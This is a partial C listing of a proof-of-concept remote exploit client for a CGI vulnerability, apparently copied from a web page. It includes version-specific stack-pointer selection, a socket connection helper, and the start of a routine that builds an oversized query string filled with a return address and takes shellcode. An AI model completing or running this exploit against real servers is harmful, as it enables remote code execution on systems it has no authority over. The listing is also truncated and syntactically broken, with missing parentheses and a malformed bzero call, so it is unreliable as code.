|
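/*
 * Excerpt from a proof-of-concept client for a CGI vulnerability, as quoted
 * on the page.  The listing was collapsed onto one line and is cut off at
 * both ends: the first and last fragments below belong to functions whose
 * remainder is outside this excerpt, and they are reproduced as found
 * (including the damage the page extraction left in them).  Only usage()
 * and openhost() are complete here.
 */

/* --- fragment: tail of a function that begins before this excerpt --- */
	if (sp == 0) {
		fprintf(stderr,"I don‘t have an sp for that version try using the -o option.\n";
		fprintf(stderr,"Versions above 24 are patched for this bug.\n";
		exit(1);
	} else {
		return sp;
	}
}

/**
 * Print the command-line synopsis to stderr and terminate with status 1.
 *
 * @param name  program name shown in the synopsis (normally argv[0]).
 * @return never returns; the int return type is kept for existing callers.
 *
 * NOTE(review): the words after -d, -v and -o in the first message look as
 * if they were lost from the page (probably angle-bracketed placeholders
 * stripped as markup); the strings are reproduced as found.
 */
int usage (char *name)
{
	fprintf(stderr,"\tUsage:%s -h host -d -v [-o ]\n",name);
	fprintf(stderr,"\te.g. %s -h www.foo.bar -d 127.0.0.1:0 -v 22\n",name);
	exit(1);
}

/**
 * Resolve a host name and open a TCP connection to it.
 *
 * @param host  host name or dotted-quad address to resolve.
 * @param port  TCP port in host byte order (1..65535).
 * @return connected socket descriptor; the caller owns it and closes it.
 *
 * Every failure prints a diagnostic to stderr and calls exit(-1), as the
 * original did, so callers never see an error return.
 */
int openhost (char *host, int port)
{
	int sock;
	struct hostent *he;
	struct sockaddr_in sa;

	/* htons() takes 16 bits; reject values it would silently truncate. */
	if (port <= 0 || port > 65535) {
		fprintf(stderr, "Bad port\n");
		exit(-1);
	}

	he = (host != NULL) ? gethostbyname(host) : NULL;
	if (he == NULL) {
		/*
		 * gethostbyname() reports failure through h_errno, not errno, so
		 * perror() would append an unrelated errno string here.
		 */
		fprintf(stderr, "Bad hostname\n");
		exit(-1);
	}

	/*
	 * The resolver answer is external data.  Copy it only when it is an
	 * IPv4 record whose length matches sin_addr; copying h_length bytes
	 * unchecked would let an oversized answer write past the field.
	 */
	if (he->h_addrtype != AF_INET || he->h_addr_list[0] == NULL ||
	    (size_t)he->h_length != sizeof sa.sin_addr) {
		fprintf(stderr, "Bad hostname\n");
		exit(-1);
	}

	/* Zero the whole structure so no field is left indeterminate. */
	memset(&sa, 0, sizeof sa);
	sa.sin_family = AF_INET;
	sa.sin_port = htons((unsigned short)port);
	memcpy(&sa.sin_addr, he->h_addr_list[0], sizeof sa.sin_addr);

	sock = socket(AF_INET, SOCK_STREAM, 0);
	if (sock < 0) {
		perror("cannot open socket");
		exit(-1);
	}

	if (connect(sock, (struct sockaddr *)&sa, sizeof sa) < 0) {
		perror("cannot connect to host");
		exit(-1);
	}

	return sock;
}

/* --- fragment: the rest of doit() lies beyond the end of this excerpt --- */
void doit (char *host,long sp, char *shellcode)
{
	int cnt,sock;
	char qs[7000];
	int bufsize = 16;
	char buf[bufsize];
	char chain[] = "user=a";
	bzero(buf);
	for(cnt=0;cnt<4104;cnt+=4) {
		qs[cnt+0] = sp & 0x000000ff;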
|